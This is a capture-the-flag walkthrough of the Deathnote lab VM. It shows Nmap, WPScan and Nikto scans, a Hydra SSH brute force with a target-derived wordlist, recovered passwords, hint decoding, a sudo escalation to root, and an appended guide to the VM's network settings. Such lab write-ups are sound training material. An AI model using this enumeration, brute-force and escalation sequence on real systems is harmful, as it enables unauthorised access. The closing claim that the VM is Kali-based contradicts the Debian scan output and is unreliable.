Deathnote

This post records in detail the scan of 192.168.0.111: Nmap host discovery, service versions and open ports, WPScan checks for WordPress security weaknesses, Nikto, and a password brute-force attempt with Hydra. The focus is on WordPress configuration weaknesses and version information.
$ sudo nmap -sP 192.168.0.1/24 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-05 14:35 CST
Nmap scan report for 192.168.0.1
Host is up (0.00050s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.100
Host is up (0.20s latency).
MAC Address: 94:E2:3C:A7:02:C9 (Intel Corporate)
Nmap scan report for 192.168.0.103
Host is up (0.16s latency).
MAC Address: 52:43:BB:A1:BF:A7 (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.18s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for earth.local (192.168.0.108)
Host is up (0.18s latency).
MAC Address: 50:01:D9:DA:FA:DD (Huawei Technologies)
Nmap scan report for 192.168.0.109
Host is up (0.0010s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.111
Host is up (0.00047s latency).
MAC Address: 08:00:27:B6:FA:40 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (8 hosts up) scanned in 6.72 seconds
$ sudo nmap -sV -sC -A 192.168.0.111
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-05 14:35 CST
Nmap scan report for 192.168.0.111
Host is up (0.00052s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
|   256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_  256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:B6:FA:40 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 192.168.0.111

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.63 seconds
$ wpscan --url http://192.168.0.111/wordpress -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.111/wordpress/ [192.168.0.111]
[+] Started: Tue Apr  5 15:12:26 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.111/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.0.111/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.111/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.111/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.0.111/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.8'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.0.111/wordpress/, Match: 'WordPress 5.8'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================================================================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] kira
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Apr  5 15:12:27 2022
[+] Requests Done: 48
[+] Cached Requests: 4
[+] Data Sent: 12.469 KB
[+] Data Received: 136.091 KB
[+] Memory used: 151.547 MB
[+] Elapsed time: 00:00:00
$ nikto -host http://deathnote.vuln/wordpress
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.111
+ Target Hostname:    deathnote.vuln
+ Target Port:        80
+ Start Time:         2022-04-05 15:13:34 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://deathnote.vuln/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /wordpress/license.txt: License file found may identify site software.
+ /wordpress/: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wordpress/wp-content/uploads/: Directory indexing found.
+ /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wordpress/wp-login.php: Wordpress login found
+ 7785 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2022-04-05 15:14:16 (GMT8) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
username: kira
passwd: iamjustic3

Contents of notes.txt, the wordlist used with Hydra below:
death4
death4life
death4u
death4ever
death4all
death420
death45
death4love
death49
death48
death456
death4014
1death4u
yaydeath44
thedeath4u2
thedeath4u
stickdeath420
reddeath44
megadeath44
megadeath4
killdeath405
hot2death4sho
death4south
death4now
death4l0ve
death4free
death4elmo
death4blood
death499Eyes301
death498
death4859
death47
death4545
death445
death444
death4387n
death4332387
death42521439
death42
death4138
death411
death405
death4me
$ hydra -l l -P ~/notes.txt 192.168.0.111 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-05 16:02:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 43 login tries (l:1/p:43), ~3 tries per task
[DATA] attacking ssh://192.168.0.111:22/
[22][ssh] host: 192.168.0.111   login: l   password: death4me
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-05 16:02:16
l@deathnote:~$ ls
user.txt
l@deathnote:~$ cat user.txt 
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.
i think u got the shell , but you wont be able to kill me -kira
l@deathnote:~$ find / -name "L"
/opt/L
The hex string found under /opt/L decodes to a base64 string, which in turn decodes to a password:
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
cGFzc3dkIDoga2lyYWlzZXZpbCA=
passwd : kiraisevil 
```bash
l@deathnote:/opt/L/fake-notebook-rule$ su kira
Password: 
kira@deathnote:/opt/L/fake-notebook-rule$ id
uid=1001(kira) gid=1001(kira) groups=1001(kira),27(sudo)
kira@deathnote:/opt/L/fake-notebook-rule$ sudo su -l
[sudo] password for kira: 
root@deathnote:~# ls
root.txt
root@deathnote:~# cat root.txt 


      ::::::::       ::::::::       ::::    :::       ::::::::       :::::::::           :::    :::::::::::       :::::::: 
    :+:    :+:     :+:    :+:      :+:+:   :+:      :+:    :+:      :+:    :+:        :+: :+:      :+:          :+:    :+: 
   +:+            +:+    +:+      :+:+:+  +:+      +:+             +:+    +:+       +:+   +:+     +:+          +:+         
  +#+            +#+    +:+      +#+ +:+ +#+      :#:             +#++:++#:       +#++:++#++:    +#+          +#++:++#++   
 +#+            +#+    +#+      +#+  +#+#+#      +#+   +#+#      +#+    +#+      +#+     +#+    +#+                 +#+    
#+#    #+#     #+#    #+#      #+#   #+#+#      #+#    #+#      #+#    #+#      #+#     #+#    #+#          #+#    #+#     
########       ########       ###    ####       ########       ###    ###      ###     ###    ###           ########       

##########follow me on twitter###########3
and share this screen shot and tag @KDSAMF
root@deathnote:~# exit
logout
```
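The /opt/L hint was decoded in two steps above (hex, then base64). As an added example that is not the writeup's own code, the function below generalises that: it peels hex and base64 layers off a string until nothing decodes further, returning each step. HEX_HINT is the encoded string from the page.

```python
import base64
import binascii
import string

# The encoded hint from the page: hex bytes that decode to a base64 string.
HEX_HINT = "63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d"


def _try_hex(s):
    # Hex needs a non-empty, even-length run of hex digits that is valid UTF-8.
    if not s or len(s) % 2 or any(c not in string.hexdigits for c in s):
        return None
    try:
        return bytes.fromhex(s).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def _try_base64(s):
    # validate=True rejects characters outside the base64 alphabet
    # instead of silently skipping them.
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def peel(blob, max_layers=5):
    """Strip hex and base64 layers until the text is neither.

    Returns a list of (encoding, decoded_text) steps, outermost first.
    Hex is tried first: a pure-hex string with a length that is a multiple
    of four is also valid base64, so the order matters.
    """
    steps = []
    current = blob
    for _ in range(max_layers):
        compact = "".join(current.split())  # drop spaces and newlines
        kind, decoded = "hex", _try_hex(compact)
        if decoded is None:
            kind, decoded = "base64", _try_base64(compact)
        if decoded is None:
            break
        steps.append((kind, decoded))
        current = decoded
    return steps


if __name__ == "__main__":
    for kind, text in peel(HEX_HINT):
        print("%-6s -> %r" % (kind, text))
```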
### How to change the network interface settings on the DeathNote VM

On a penetration-testing target VM such as DeathNote, changing the NIC settings usually means configuring the interface's IP address, subnet mask, gateway and DNS servers. The steps are as follows:

#### 1. Inspect the current interfaces

List the system's network interfaces and their state with:

```bash
ifconfig
```

or, on newer Linux systems:

```bash
ip a
```

This lists every available interface and its configuration[^1].

#### 2. Edit the interface configuration file

The DeathNote VM is based on Kali Linux; its network configuration usually lives in `/etc/network/interfaces` or under `/etc/netplan/`. The exact path depends on the system version.

**Traditional `interfaces` file:** edit `/etc/network/interfaces` to change the NIC settings:

```bash
nano /etc/network/interfaces
```

Add or modify content like the following:

```plaintext
auto eth0
iface eth0 inet static
    address 192.168.1.100
    netmask 255.255.255.0
    gateway 192.168.1.1
    dns-nameservers 8.8.8.8 8.8.4.4
```

Here `eth0` is the interface name; replace it with the correct interface for your environment[^2].

**Netplan configuration:** if the system uses Netplan, edit the `/etc/netplan/*.yaml` file instead, for example:

```bash
nano /etc/netplan/01-netcfg.yaml
```

Add or modify the following:

```yaml
network:
  version: 2
  renderer: networkd
  ethernets:
    eth0:
      dhcp4: no
      addresses:
        - 192.168.1.100/24
      gateway4: 192.168.1.1
      nameservers:
        addresses:
          - 8.8.8.8
          - 8.8.4.4
```

After editing, apply the configuration:

```bash
netplan apply
```

#### 3. Change the IP address temporarily

If the IP address only needs to change until the next reboot, use:

```bash
ifconfig eth0 192.168.1.100 netmask 255.255.255.0 up
```

or the `ip` command:

```bash
ip addr add 192.168.1.100/24 dev eth0
ip link set eth0 up
```

Then set the default gateway:

```bash
route add default gw 192.168.1.1
```

or with the `ip` command:

```bash
ip route add default via 192.168.1.1
```

#### 4. Verify the network configuration

Once the steps above are done, check that the network is reachable:

```bash
ping 192.168.1.1
```

and that DNS resolution works:

```bash
nslookup google.com
```

---